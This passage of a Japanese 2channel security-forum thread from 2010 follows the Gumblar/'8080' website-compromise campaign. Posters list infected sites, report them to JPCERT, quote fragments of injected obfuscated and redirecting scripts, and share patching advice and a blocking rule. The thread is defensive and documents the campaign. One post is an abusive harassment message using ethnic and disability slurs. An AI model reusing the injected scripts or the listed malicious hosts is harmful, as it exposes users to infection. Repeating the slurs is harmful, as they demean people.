もともとウイルス配布サイトだからこのスレとは関係ないよ
改ざんではなくて元からそういうサイトなの
どっかのスレにあったならNG登録しといたほうがいいよ
393:名無しさん@お腹いっぱい。
10/06/01 22:05:29
一般社団法人 Mozilla Japan は、日本国内における Mozilla の製品および関連技術の普及啓蒙を目的として設立された
はずなんだけどな
394:名無しさん@お腹いっぱい。
10/06/01 22:06:25
誤爆った
395:名無しさん@お腹いっぱい。
10/06/01 22:10:39
危険ドメインリスト(アカウントハックウイルス関係, CGI版) - BS-Template (BSWiki)
URLリンク(smith.rowiki.jp)
396:名無しさん@お腹いっぱい。
10/06/01 22:11:26
URLリンク(smith.rowiki.jp)
397:名無しさん@お腹いっぱい。
10/06/01 23:04:46
>>380
URLリンク(blog.goo.ne.jp)
>>このHPのようにアクセスが数百程度のHPも脅威の対象かな?
自称危機管理専門家なのに(笑) 大手とか関係ないぞ
こんな認識のヤツは頼むから運用しないでくれよ
398:名無しさん@お腹いっぱい。
10/06/01 23:16:11
いつこのGunblerや8080が終息に向かうんだろうか?
どんどん悪化してきているような気がする…
399:316
10/06/02 00:37:35
>>397
公人としての自覚が(ry
>>280
403や404返してますね。
なにかあったのでしょうか?(棒
400:名無しさん@お腹いっぱい。
10/06/02 00:42:06
削除依頼スレ見てきた
削除依頼出すのはいいけど、セキュ板実質管理者居ないから、
他のスレのとまとめて長期未処理スレに報告したほうがいいと思う
まとめて出してくるわ
401:コテハン ◆8080adndqg
10/06/02 01:09:39
>>400 orz...
402:名無しさん@お腹いっぱい。
10/06/02 10:22:03
>>398
そうなんだよなぁ
こちらは感染しない対策をしてればいいんだが
そういう問題でもないからなあ、被害総額はどのくらいなのだろうか
そもそも感染しない対策すら知らない人が多そうだし
403:名無しさん@お腹いっぱい。
10/06/02 11:50:36
>>402
自分は2chをやらなかったらGunblerも対策も知らなかったよ
対策の仕方を読んでもいまだによくわからないし
被害と言うのはGunblerを踏んで何かを流出させた人だけではなくて
Gunblerを踏んでしまってクリーンインストールをしなければならない手間や
Gunblerを仕込まれてしまってサイトを直さねばらない手間や費用も
被害と言えば被害だよね
404:コテハン ◆8080adndqg
10/06/02 12:36:35
>>398
永遠に終わらないような気が・・orz
【陥落サイトのURL悪用厳禁】
www●goshikionsen●net/access
www●fashion389●com/datsushien
■本日の目玉商品w
<!--ショッピングサイト(トロイ付)構築を行っております-->
eccube●jp/
↓見本ページ(やっぱりトロイ付)↓
eccube●jp/demo/
405:名無しさん@お腹いっぱい。
10/06/02 13:08:27
>>403
> 対策の仕方を読んでもいまだによくわからないし
これは問題だろ
どこがわからんのかkwsk
なんとなくわからんとか理解する気がないとかじゃなく文章ちゃんと読んで
どこがわからんのか教えてくれ
406:名無しさん@お腹いっぱい。
10/06/02 15:00:52
www●j-sports●or●jp :Gred、Dr.Web反応せず/精査よろ
vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/ :再凸済み
>>367-369
一通りチェックが終了したので、昨日付けでJPCERTに報告しました
これだけの数、何処までやってくれるか判りませんけどね
>>404
www●goshikionsen●net
www●fashion389●com/datsushien/
eccube●jp
JPCERT/CCに報告しました
407:名無しさん@お腹いっぱい。
10/06/02 15:30:20
>>406
j-sportsは今日付けで変更されてるページをいくつか確認
とりあえず修正したのかもしれない
再改ざんの可能性もあるので要観察かな
TOPがこんなかんじで1時間前くらい
Last-Modified: Wed, 02 Jun 2010 05:10:14 GMT
408:名無しさん@お腹いっぱい。
10/06/02 15:36:53
ジェーピーサートコーディネーションセンターの中の人って何人なんだろうね?
こんなに頻出してたら大変だろうに
409:名無しさん@お腹いっぱい。
10/06/02 15:44:02
>>404
URLリンク(www.virustotal.com)
祝 全スルー
410:名無しさん@お腹いっぱい。
10/06/02 15:50:00
JPCERTも対応していれば大変だろうけど、してないんじゃないかな。
していれば、ISPの対処のスピードも上がるでしょう。
デジロックみたいな所が、だらだらとやっている位ですから、何もやっていないでしょうね。
411:名無しさん@お腹いっぱい。
10/06/02 15:56:27
>>403
・windows update
とにかく最新にしとけ、XP sp2の人もまだいるみたいだから
その場合はカスタム更新で
・Adobe Reader
要らん場合はインストールすんな
・Adobe ReaderのAcrobat JavaScript
>>4のとおり
・JRE(Java Runtime Environment)を最新版に更新する
要らん場合はインストールすんな
プリインストールされてる場合はアンインストール後にCCleanerで掃除
・Flash Playerを最新版に更新する
バージョンチェックはしておこう
・QuickTimeを最新版に更新する
alternativeでおk、ブラウザにプラグインなんか入れんな
412:名無しさん@お腹いっぱい。
10/06/02 17:00:19
kanto●itca●or●jp/wic/attachment/97/resource-253●html
社団法人情報通信設備協会 関東地方本部
413:名無しさん@お腹いっぱい。
10/06/02 17:05:46
>>412
遂にお会い出来ましたね、com:8080さん
414:316
10/06/02 17:15:58
>>412
おぉ、ソースの誘導先のソースでAVIRAが珍しくピコった。
com:8080はじめて見た。
415:名無しさん@お腹いっぱい。
10/06/02 17:18:21
Gumblar.xはじめ色々な改ざん==
fun●s331●xrea●com/ikeacat/r●js
sale●s334●xrea●com/?p=127
bara●s317●xrea●com/
sakura●s316●xrea●com/?p=136
ps2●s307●xrea●com/?p=135
www●tctv●ne●jp/s-pato/tyuuka●html
sijoanna●finito●fc2●com/
meringue●s48●xrea●com/pm/2004/04/
toko72●s289●xrea●com/adhocmart●com/renaiunaphuusui/
elesty●s25●xrea●com/s-album/kie-album-39●htm
soverign●s154●xrea●com/
416:コテハン ◆8080adndqg
10/06/02 17:41:14
eccube●jp/逃げるの早いなw
↓禿のキャッシュ↓
cache●yahoofs●jp/search/cache?p=site%3Aeccube●jp%2F&search●x=&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&u=eccube.jp/&w=eccube+●jp&d=Ku2UhO8_U3HZ&icp=1&●intl=jp
417:名無しさん@お腹いっぱい。
10/06/02 17:45:18
Gumblarのスペルすら間違えるような人は
IPAやJPCERTやセキュmemoを見ていないんだろうなぁ。
418:名無しさん@お腹いっぱい。
10/06/02 17:51:36
逃げ得は許さない
419:名無しさん@お腹いっぱい。
10/06/02 17:59:37
>>416
今回は魚拓をとってから電凸したのであつた
魚拓e ccube.jp/
URLリンク(megalodon.jp)
420:名無しさん@お腹いっぱい。
10/06/02 17:59:50
gredで危険ですとか言われたサイトは踏んじゃうとやばいんですか?
エロゲの公式さいとなんですけど
421:名無しさん@お腹いっぱい。
10/06/02 18:00:56
>>420
たぶんはい
422:名無しさん@お腹いっぱい。
10/06/02 18:05:29
>>421
公式にいかないと修正パッチがあてられない・・・orz
リンク先のページもチェックするにチェックを入れなかった時は安全ですと言われたんですけど
ちょっとぐらいのぞいても大丈夫ですよね
423:名無しさん@お腹いっぱい。
10/06/02 18:07:04
>>411
>プリインストールされてる場合はアンインストール後にCCleanerで掃除
ここがよくわからん
コントロールパネルから消してjava6:20以外どこにも無いのに外部ソフトウェアが必要なの?
424:名無しさん@お腹いっぱい。
10/06/02 18:08:27
>>419
GJ
425:名無しさん@お腹いっぱい。
10/06/02 18:11:29
>>422
修正パッチなんて配布支援サイトを探せばいいじゃない
とりあえずブランド名plz
426:名無しさん@お腹いっぱい。
10/06/02 18:13:07
>>425
祝福のカンパネラです
427:名無しさん@お腹いっぱい。
10/06/02 18:13:51
あいよ
428:名無しさん@お腹いっぱい。
10/06/02 18:28:13
>>412
それって無関係かもしれんよ
www●google●co●jp/search?hl=ja&q=site%3Akanto●itca●or●jp%2F
www●google●co●jp/search?q=site%3Akanto●itca●or●jp%2Fwic%2F
429:名無しさん@お腹いっぱい。
10/06/02 18:42:38
>>426
ごめん。まだ見てたらURLを加工して貼ってくれ
感染箇所を見つけられない‥。
もし黒ならアニメ化するってのにorz
430:名無しさん@お腹いっぱい。
10/06/02 18:48:05
>>426
avast! 4.8の100602-0の定義ファイルで踏んでみたがなんともないような
さらっとソースと.jsも見たがそれっぽいのが見当たらないな
セキュソフトはなに?
431:名無しさん@お腹いっぱい。
10/06/02 18:50:58
ああgredで見たのか
432:名無しさん@お腹いっぱい。
10/06/02 18:51:14
>>429
工作板の本スレ>>1にある上から二番目のURLです
URL貼り方はこうでいいですか?
windmill●suki●jp/product/campanella/
433:名無しさん@お腹いっぱい。
10/06/02 18:56:03
>>432
白だとおも
434:名無しさん@お腹いっぱい。
10/06/02 18:56:26
>>426
あちこち確認しながら見てたら時間が…
ソースには特に変なものはなかったです、Dr.Webも反応しませんでした
Gredもhtmlはシロ判定を返してるみたいですし大丈夫かと
というか、Gredが修正パッチを誤検出してるっぽいです
VTではシロ判定URLリンク(www.virustotal.com)
exe絡みだとスレ違いだし、まぁこんな回答しか返せませんけど良いですか?
435:名無しさん@お腹いっぱい。
10/06/02 18:59:27
>>433>>434
何事も無かったようでほっとしました!
お二人ともご親切にありがとうざいました
436:名無しさん@お腹いっぱい。
10/06/02 19:00:11
一応、原作ファンとして心配になったのでexeもチェックしたけど特に異常はない
URLリンク(mirror1.lapistan.jp:8000)
の:8080を誤検知したとかってオチだとおも
437:名無しさん@お腹いっぱい。
10/06/02 19:25:49
:8080じゃないし
438:名無しさん@お腹いっぱい。
10/06/02 20:02:18
>5を踏んじゃったんですが、
大丈夫でしょうか?荒らし酷いな
439:名無しさん@お腹いっぱい。
10/06/02 20:08:35
>>438
専ブラ使えばレス見てわかるとおもうんで専ブラ導入推奨
440:名無しさん@お腹いっぱい。
10/06/02 20:33:46
>>416
処理早いのは良いことなんですけどね 告知できればなお良
>>419
17:08時点では修正済みでは? 感染時ソースの魚拓↓
URLリンク(megalodon.jp)
外部.jsの場合、自分は魚拓を表示できないので
ピリオドをパーセントエンコードするか、JSUNPACKのレポートにして欲しいです↓
URLリンク(megalodon.jp)
URLリンク(jsunpack.jeek.org)
441:名無しさん@お腹いっぱい。
10/06/02 21:27:53
>>428
サイトが乗っ取られてみたいです
442:名無しさん@お腹いっぱい。
10/06/02 21:33:50
>>423
アンインストール後にJREの残骸が残ることがあるかもしれないので
念のためにCCleanerでレジストリを調べておくといいかもしれないということ
443:名無しさん@お腹いっぱい。
10/06/02 22:35:24
>>412 404返すようになってきた
URLリンク(megalodon.jp)
Last-Modified: Wed, 06 Aug 2008 18:40:52 GMT
2008年に乗っ取られたのがガンブラーのおかげで発覚したのか
444:名無しさん@お腹いっぱい。
10/06/03 00:50:13
>>438
いつ踏んだんですか?とりあえず一週間ほど前に対策とられたみたいなので、
ここ数日の事であれば大丈夫ですよ。
445:名無しさん@お腹いっぱい。
10/06/03 04:53:57
>>412,429
www●mypersonalhttp●com:8080 ← ここに行って
goscanfor●com ←ここに飛ばされ
microsoft●msn●com●chimen●info ←ここでFakeAVの実演販売
Google先生も怒ってます
446:名無しさん@お腹いっぱい。
10/06/03 05:01:18
445です
gred先生は「このサイトは安全です」とな(ダメじゃん)
447:名無しさん@お腹いっぱい。
10/06/03 07:27:53
>>443
大元は[社団法人 情報通信設備協会]URLリンク(itca.or.jp)<) が URLリンク(tkanto.itca.or.jp) に転送される
URLリンク(www.google.com)
2年前からコメントスパム配信基地だった
448:447
10/06/03 07:40:47
×コメントスパム
○トラックバックスパム
449:名無しさん@お腹いっぱい。
10/06/03 08:40:58
>>442
げぇ……レジストリまで探らないといけないのか
そんなのここに初めて来たばかりのPCに疎い人とかにさせたら
重要なの消して悲惨な事になりそうだ
そこまで徹底的にしないと対策が不十分と言われるんじゃ
未だにガンブラー広がってるのも納得
広がってるスピードや広がってる対象(政府関連、ウェブ業者関連)がおかしいとは思うけど
450:名無しさん@お腹いっぱい。
10/06/03 10:03:19
>>440
ECCUBE.JPの訂正
URLリンク(megalodon.jp)
451:名無しさん@お腹いっぱい。
10/06/03 10:39:09
取扱注意
www●cowtv●jp/channel/student/index●php
452:名無しさん@お腹いっぱい。
10/06/03 11:19:37
www●odcc●jp
大阪デジタルコンテンツビジネス創出協議会
世界へ優れたコンテンツ…じゃなくてウィルス発信中
453:名無しさん@お腹いっぱい。
10/06/03 11:25:24
>>451 452
どちらもすごいですね 凸完
454:名無しさん@お腹いっぱい。
10/06/03 13:16:37
www●triskelionpublishing●net/
455:コテハン ◆8080adndqg
10/06/03 14:45:53
【陥落サイトのURL悪用厳禁】
www●ktm-ktm●com/tomoko ←途中切れ
www●w-ouen●com/i/machi ←未対応
www●kyotoclub-ilias●net/m/ ←電話用
www●triskelionpublishing●net/index●html ←途中切れ
www●giuglianoweb●com ←途中切れ
gpindy●com/ ←電話用
www●haisui●com/ec/html/
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com ←絶賛放置中
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
【本日の(ry
infotop777●com/detail●php?id=style1198741395
↓ページ内の[Click Here!]を押した先↓
okuo2●cyberinfostation●jp/ ←\(^o^)/
456:名無しさん@お腹いっぱい。
10/06/03 16:16:14
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
infotop777●com/detail●php?id=style1198741395
okuo2●cyberinfostation●jp/
鯖屋とJPCERT連絡完了。
457:名無しさん@お腹いっぱい。
10/06/03 16:20:15
kanto●itca●or●jp/の「お問い合わせ」のドメインが
共有SSLだしGoogleにキャッシュされてるし、胡散臭い
URLリンク(www.google.com)
458:名無しさん@お腹いっぱい。
10/06/03 17:32:51
www●torihada●com
鳥肌実公式サイトが…
459:名無しさん@お腹いっぱい。
10/06/03 19:22:51
kanto●itca●or●jp/
社団法人情報通信設備協会 関東地方本部
知らせたのにお礼のメールもなし。告知もなし。
こんな団体がセキュリティを語るな!
また、ページのTopにゴルフコンペの案内ってどんな温い団体なんだよ。
蓮舫 次はここをバッサリ切ってくれ
460:名無しさん@お腹いっぱい。
10/06/03 19:42:53
>>459
そこ、さっき電凸しました
分かる者が不在だから明日掛け直してくれといってました
今日は無理なんじゃないの?
461:名無しさん@お腹いっぱい。
10/06/03 19:45:32
>>447 >>457 >>459
kanto●itca●or●jp/ はフィッシングサイトかも
462:名無しさん@お腹いっぱい。
10/06/03 20:33:54
↑ 修正済み??
463:名無しさん@お腹いっぱい。
10/06/03 21:07:14
>>462
>>443の時点で改竄されていたattachment/97/以下が404
Yahoo!のキャッシュにもガンブラーはないみたい
URLリンク(siteexplorer.search.yahoo.co.jp)
URLリンク(siteexplorer.search.yahoo.co.jp)
464:名無しさん@お腹いっぱい。
10/06/03 22:48:48
>>459
いったいどんなスクリプトが?
465:名無しさん@お腹いっぱい。
10/06/03 23:38:59
>>464
感染時のソースの魚拓。
URLリンク(megalodon.jp)
</head><body><script>~
飛び先が.com:8080。珍しくAVGが反応した
466:316
10/06/04 00:18:26
>>458
Last-Modified: Sat, 29 May 2010 14:27:16 GMT : URLリンク(megalodon.jp)
Last-Modified: Sat, 29 May 2010 14:27:33 GMT : URLリンク(megalodon.jp)
Last-Modified: Sat, 29 May 2010 14:27:24 GMT : URLリンク(megalodon.jp)
>>440
こんなんでいい?
467:名無しさん@お腹いっぱい。
10/06/04 10:15:30
>>463
乙です
468:名無しさん@お腹いっぱい。
10/06/04 10:43:39
mokunen●com
木質燃料だけに…
469:名無しさん@お腹いっぱい。
10/06/04 11:10:45
d-money●jp
470:名無しさん@お腹いっぱい。
10/06/04 11:47:10
>>458
>>468
IPA、JPCERTに報告しました
>>469
IPA、JPCERTに報告しました
Aviraに検体を提出、返事待ち
471:名無しさん@お腹いっぱい。
10/06/04 13:26:42
>>449
FFRWとかのレジストリ掃除ツール使えば手動で弄らなくてもそういう残骸はみんな消せるんだけどね
トラブルもほぼ起きない(RegSeekerみたいな漢専用ツールもあるから前評判は確かめた方がいいけど)
でも初心者じゃレジストリとか知らんだろうしな
俺は普通高校でhtml言語とかWordとかほんの少しやったけど
あんなもの教えるくらいならPCのセキュリティについて教えればいいのに
472:名無しさん@お腹いっぱい。
10/06/04 14:02:52
先生が教えられることは先生が説明できることだけだ
473:名無しさん@お腹いっぱい。
10/06/04 14:06:24
>>471
何歳だか知らんけど、既に教える内容は変わっていると思われ。
オッサンの俺はそもそも学校でPCなんか教わらなかった
(PC9801でDOSでパソコン通信の時代。当時の高校生は
友達とはポケベルでコミュニケーションしていた)。
数学や英語などと違って技術の進歩に合わせて頻繁に変わる
(変えざるを得ない)から、先生が大学で修得していなかったことを
教える羽目になってる(教科書棒読みの)数少ない教科なんじゃないかな。
474:名無しさん@お腹いっぱい。
10/06/04 14:56:57
adgaw●com/keyword/b/
475:名無しさん@お腹いっぱい。
10/06/04 15:33:14
五色温泉の抱えてた切符ってラトビア行きだっけ?
476:コテハン ◆8080adndqg
10/06/04 16:29:29
>>470 乙乙
【陥落サイトのURL悪用厳禁】
www●amakusaturigu●com/ ←絶賛放置中
www●kadaru●mydns●to/ ←相変わらず未対応(悪質)
↓↓↓↓↓
architects-egg●kadaru●mydns●to/ /(^o^)\
www●ad-jeaayf●com/links/
※※※アクセス注意!※※※
www●bestofunder●com/
↓
<script language="JavaScript">top.location = 'hURLリンク(antiviru)<)●ru/">
<center><a href="hURLリンク(antiviru)<)●ru/"> Click Here</a>
※最下部のGumblar.xはきっと無害
www●bestofunder●com/indexst●html ←これが本家かな?
477:名無しさん@お腹いっぱい。
10/06/04 16:50:24
少しは役に立つ機関… なのに知名度低いんだよな
URLリンク(www.ipa.go.jp)
478:316
10/06/04 18:09:26
>>280
Last-Modified: Fri, 04 Jun 2010 07:32:33 GMT
> 当財団ウェブサイトへのウィルス感染に関するお詫びとご報告
479:名無しさん@お腹いっぱい。
10/06/04 20:54:44
PUA.HTML.Infected.WebPage-2
これもこのウイルスの検出名でおk?
480:名無しさん@お腹いっぱい。
10/06/04 21:36:24
それを確認してどうするのかと
481:名無しさん@お腹いっぱい。
10/06/04 21:44:54
>>480
常駐以外のを使ってこれを検出した
スプリクトに反応しただけなら問題ないから確認したかったが、スレチだったな
482:名無しさん@お腹いっぱい。
10/06/04 22:07:38
ブラウザキャッシュなら名前より検出場所でわかるんじゃないの
483:名無しさん@お腹いっぱい。
10/06/04 22:15:27
>>482
場所見る前にブルスクった
まあ大丈夫だろうし、ありがとう
484:名無しさん@お腹いっぱい。
10/06/04 22:17:47
どういうエラーで落ちたのかにもよるけどそれは問題あるとおもいます
485:444
10/06/04 22:41:43
>>466
どもです
関連リンク
[いま一番危ないぜい弱性は何だ? - 今週のSecurity Check:ITpro]
URLリンク(itpro.nikkeibp.co.jp)
Java(JRA) 38%
Adobe Reader/Acrobat 36%
MDAC (UpdateしてないExcel)19%
[本当の攻撃はこれから? Gumblarが怖い本当の理由 - TechTargetジャパン 情報セキュリティ]
URLリンク(techtarget.itmedia.co.jp)
(要会員登録or[-CmsMembersControl])
「Gumblar(ガンブラー)の攻撃モデルは、近年まれに見る成功例」鵜飼裕司
2010.03.25と古いですが
最近見て、改竄された不名誉は甘んじて受ける姿勢が好感したので↓
[音素材サイト『ザ・マッチメイカァズ』閉鎖の危機?! 管理人が語る“ガンブラー”の脅威- ガジェット通信]
URLリンク(getnews.jp)
486:名無しさん@お腹いっぱい。
10/06/04 22:45:16
>>484 どういうエラーで
Dr.webの異常終了で、既知の問題だからおk
part4からの住人で対策はとっくにやってある
487:485
10/06/04 22:45:23
444じゃなくて440でしたごめんなさい
488:486
10/06/04 22:46:35
あ、part5だた
489:456
10/06/05 03:16:56
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
封鎖確認
wakwak案外はやいww
490:名無しさん@お腹いっぱい。
10/06/05 09:02:43
僕はちょうせんじん知的障害者です
魚醤系316系の僕のちょうせんじん知的障害者まとめです
322 :316:2010/05/30(日) 03:42:15 ←なまえ316系 え?何これ怖いです。。。
324 :315:2010/05/30(日) 08:32:37 ←なまえ316系さん?315?え?自分にお返事 何これ怖いです。。。
315
378 :316:2010/06/01(火) 01:43:29 ←魚醤? え?魚醤てなんですか? あぁー。。。怖いです。。。(魚醤系)
>>375
あぁー。。。
>>280のアドレスで具具れば魚醤~
419 :名無しさん@お腹いっぱい。:2010/06/02(水) 17:59:37 ←あ!魚拓になりました!よかったのであつた!
>>416
今回は魚拓をとってから電凸したのであつた
同人の魚拓好き腐まんこさん?あほ(ry
__、、=--、、 __
/ ・ ゙! /・ `ヽ
| ・ __,ノ (_ ・ |
ヽ、 (三,、, _) / 僕あほ ちゃうどー 電凸すきやねん電凸て何?
/ー-=-i'’ (____,,,.ノ
|__,,/ |__ゝ ← 新型Gumblar>316型 魚醤系 ボンクラ腐まんこ(推定)
〉 ) ( )
↑
ぼくは知能指数?12です僕です(ry
491:名無しさん@お腹いっぱい。
10/06/05 12:07:31
にほんごでおk
492:名無しさん@お腹いっぱい。
10/06/05 14:58:03
>>491
反応しちゃダメだ。
華麗にスールだぞ
493:名無しさん@お腹いっぱい。
10/06/05 16:01:19
>>476
www●amakusaturigu●com :Forbidden
www●bestofunder●com :Gredで「Misleading Application (BW017B)」
後は変化なし
494:コテハン ◆8080adndqg
10/06/05 16:36:21
■ホームページ更新代行
www●7500zei●com/ ←既に修正済
※ソースの最下部に8080の痕跡
<!--d2392c04537c5eaf61fe86d1998535a1-->
↓びんぐがコードを捕捉(きゃっしゅ)してた↓
cc●bingj●com/cache●aspx?q=site%3awww●7500zei●com%2f&d=4616900965040755&mkt=ja-JP&setlang=ja-JP&w=db69f17b,70c28a29
495:名無しさん@お腹いっぱい。
10/06/05 17:01:40
今日windows defenderでスキャンしたら
何か検出されたので検索したらどうやら
ガンブラー系っぽいものだった。
ガンブラー対策はこまめにしてた。
削除しようとしたら
再起動を促されて再起動したけど
セーフモードですら起動せず・・・・
泣く泣くクリーンインストールしました。
何かこれまでの対策が効かない
新型亜種でも出回っているのですか?
496:名無しさん@お腹いっぱい。
10/06/05 17:27:15
>>496
何を根拠にガンブラー言うのかわからんのだが・・・
>>4は8080系用の対策方法だから、違う系統の改竄に対しては効果が無い場合がある。
Gumblar(ガンブラー)=サイト改竄の総称と決め付けてしまった
某セキュリティソフトベンダーと、それをそのまま報道したマスゴミの罪は大きい
497:496
10/06/05 17:29:18
安価まちがえたorz
>>496→>>495
498:名無しさん@お腹いっぱい。
10/06/05 17:30:51
>>495
検出ウイルス名は?
499:名無しさん@お腹いっぱい。
10/06/05 17:40:07
>>495 です。
ウイルス名はそもそもクリーンインストールしてしまったので
わからなくなってしまったんだけど、「downloader」みたいな単語があった
気がします。
検出されたウイルス名をググッたら完全にHITはしなかったんだけど
同じようなウィルス名のものがどうやらガンブラー系とのことでした。
ちなみにOSはXP SP3 でウイルス対策ソフトはAVAST5free、
火壁は PC TOOLS、ブラウザはIE7です。
アップデートとかこまめにやってましたが・・・
ほぼ毎日スキャンはしてました。
ちなみに今回のウイルスを検出したのは
windows defender でした。
500:名無しさん@お腹いっぱい。
10/06/05 17:58:47
>>499
windows defenderでウイルスって検出するの?
downloaderこれだけじゃなんともいえん
他にもたくさんある
501:名無しさん@お腹いっぱい。
10/06/05 18:06:30
こまめにアップデートしながらIE7?
何か色々穴がありそうな人だな
502:名無しさん@お腹いっぱい。
10/06/05 18:10:35
>>499
IE7の時点でこまめにやってるとは言えない
503:名無しさん@お腹いっぱい。
10/06/05 18:17:27
ゼロデイのAdobeにまたまたゼロデイw
URLリンク(www.adobe.com)
504:名無しさん@お腹いっぱい。
10/06/05 18:29:23
>>499 です。
>>501-502
IE8は個人的な事情があって使ってませんでした。
今回はもう素直にIE8にしました。
>>500
毎日(平日)AVASTでスキャンしてたのですが
毎週末にdefenderでもスキャンします。
今回なぜかスパイウェアとして検出されました。
ウイルス名はやっぱり思い出せません。
ちなみにアングラなサイトには行かない程度に
ネットサーフィンする程度ですが・・・
505:名無しさん@お腹いっぱい。
10/06/05 18:33:33
この一連のウイルスの場合、アングラも非アングラも関係無いってことが判ってない時点で(ry
506:名無しさん@お腹いっぱい。
10/06/05 18:52:13
>>505
すいません。
それくらいは知っていましたが、
(大手企業のサイトも改ざんされた等)
当方それほどPCに関するスキルがないので
何とかそれなりに情報収集して対応してきた
つもりです。
でも結局やられてしまったので
ちょっと悔しくてここで愚痴っただけです。
周辺機器のドライバのインストールや
年賀状の住所録を作り直すのが
めんどくさいですね。
残りの作業も今からがんばります。
507:名無しさん@お腹いっぱい。
10/06/05 18:52:22
まぁPC初心者じゃあ解らなくてもしょうがないだろ
おまけに初心者スレにこの類を扱うスレは存在しないからここにすがるしかない
508:名無しさん@お腹いっぱい。
10/06/05 19:18:36
ここもテンプレが改竄されてる時点で
509:名無しさん@お腹いっぱい。
10/06/05 19:31:00
>ちょっと悔しくてここで愚痴っただけです。
見事な開き直りですね
510:名無しさん@お腹いっぱい。
10/06/05 21:24:05
>>506
いくつかレスキューディスクが提供されてるので試して欲しかったですね
■ノートン レスキュー ツール
URLリンク(security.symantec.com)
■Dr.Web LiveCD
URLリンク(drweb.jp)
駆除できなくても住所録の救出くらいできたはず
■WinPE
URLリンク(lets-go.hp.infoseek.co.jp)
511:名無しさん@お腹いっぱい。
10/06/05 23:38:06
>>504
IEはデフォルトの設定だと穴が多いから
Firefox+NoScript+AdblockPlus
この組み合わせを推奨する
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|URLリンク(*:8080*) をブロック
512:名無しさん@お腹いっぱい。
10/06/05 23:46:35
ほーらまたアンチFx厨が来まちゅよ~
513:名無しさん@お腹いっぱい。
10/06/06 02:09:59
FirewallやProxomitronやHIPS/IDSで遮断検知ルール作って
PC内全てのブラウザに適用出きるようにすればええがな
514:名無しさん@お腹いっぱい。
10/06/06 02:43:38
そんなスキル持ち合わせておらぬ!(キリッ
515:名無しさん@お腹いっぱい。
10/06/06 03:08:12
>>511
糞企業のザルPCには激しくオススメしたい組み合わせ
516:名無しさん@お腹いっぱい。
10/06/06 04:43:29
Flash Player, Adobe Reader and Acrobat に致命的脆弱性だってよ。
攻略コードも既に出回ってるって。
517:名無しさん@お腹いっぱい。
10/06/06 05:02:54
現時点での対策がFlash 10.1 RCにしろってのが最悪だよな。
あれはあれでクラッシュするサイトがあったりしてまだまだ不安定な代物なのに。
518:名無しさん@お腹いっぱい。
10/06/06 05:31:38
フラッシュプレイヤーとか競争相手が居ないからノンビリしてるんだろうなアドビ
のんびりし過ぎてユーザーから反感を買ってるのも知らずに・・・
519:名無しさん@お腹いっぱい。
10/06/06 06:55:03
HTML5だっけかに穴とか無ければそっちに移行してもらいたいもんだ
520:名無しさん@お腹いっぱい。
10/06/06 09:02:26
>>511
Vista以降のOSとIE8以降の組み合わせで使える保護モード使えよ
そうすりゃfirefoxより安全だろ
ChromeのWindows版や、IE8以降+Vista以降は、ブラウザの主要部分を限定された権限で動かして、
ブラウザがセキュリティーホールでやられても影響が限定されるようになってる
firefoxは全部標準の権限で動いてるから、ブラウザがセキュリティーホールでやられるとまともに影響をうける
521:名無しさん@お腹いっぱい。
10/06/06 13:46:49
ここのアクセスしたらavastがトロイを発見しましたといいます
www●pacs●co.jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/
aguseとgredでチェックしても、安全としか出ないのですが
誤検出なんでしょうか?
522:名無しさん@お腹いっぱい。
10/06/06 13:55:31
>>521
どんなトロイ?
523:名無しさん@お腹いっぱい。
10/06/06 15:38:56
URLリンク(www)●pacs●co●jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/pacs_pr/qqpr●php?d=sponser/&i=10&a=R&c=RV&w=550&h=50
ここに仕込まれてる
<script language=JavaScript>eval(unescape('var%20codelock_bas~~
524:名無しさん@お腹いっぱい。
10/06/06 16:04:15
火狐マンスェーーーーー(棒)
525:名無しさん@お腹いっぱい。
10/06/06 16:04:17
home●e-catv●ne●jp/jun/
526:名無しさん@お腹いっぱい。
10/06/06 16:12:21
>>525
どこにあるの?
527:名無しさん@お腹いっぱい。
10/06/06 16:59:13
dotetin●sakura●ne●jp/
blaugrana●sakura●ne●jp/
528:名無しさん@お腹いっぱい。
10/06/06 17:49:52
>>523
難読化されてるけど
バナーの画像を入れ替えてるだけじゃないの?
529:名無しさん@お腹いっぱい。
10/06/06 18:08:49
mqpws428●sakura●ne●jp/index7●html
具体的には分かりませんが
らしき物が見受けられます
いかがでしょうか?
530:名無しさん@お腹いっぱい。
10/06/06 18:13:08
ここは鑑定スレじゃねぇよ
531:名無しさん@お腹いっぱい。
10/06/06 18:49:16
www●bestofunder●comが強烈でワロタww
532:名無しさん@お腹いっぱい。
10/06/06 19:11:35
アドビはなんでここまでやる気ないの
ソフトは穴だらけだわバージョン更新を餌にgetplusとか怪しげなもん植えつけようとするわ
533:名無しさん@お腹いっぱい。
10/06/06 19:49:44
>>531
URLリンク(megalodon.jp)
再感染で.htaccess改竄?
URLリンク(www.dan.co.uk)●bestofunder●com/
xxxx.ruに飛ばされるから怪しいけど
ここにリンクあるから川島って人が管理してるサイトらしい
URLリンク(0000181856.seesaa.net)
534:名無しさん@お腹いっぱい。
10/06/06 20:49:34
>>529
Index丸見えで、非公開のつもりのファイルが感染してます
image/sample/sample/index6.html
怪しげな情報商材も公開中です
535:名無しさん@お腹いっぱい。
10/06/06 21:45:09
最近のGumblarはスタートアップやタスマネのプロセスでも感染の有無が分からないのかねえ
>>3-6の対策、こまめな定義更新・ウイルススキャンを地道にしていくしかないか
536:名無しさん@お腹いっぱい。
10/06/06 21:50:21
>>535
お前のアンカーがヤバイ
537:名無しさん@お腹いっぱい。
10/06/06 21:54:48
>>353
氏ね
何考えてるんだ
538:537
10/06/06 21:55:34
×>>353
○>>535
539:名無しさん@お腹いっぱい。
10/06/06 22:06:12
馬鹿にしろ故意にしろ悪質
540:名無しさん@お腹いっぱい。
10/06/06 22:08:54
リンクからブラウザ起動しないように専ブラの設定変えとけば?
541:535
10/06/06 22:14:48
変なURLのやつはもちろん省くさ
> 使用していないものはアンインストール推奨です
>
> ■ Windows XPは可能ならば新しいOSに
> ■ Windows Update / Microsoft Updateを更新
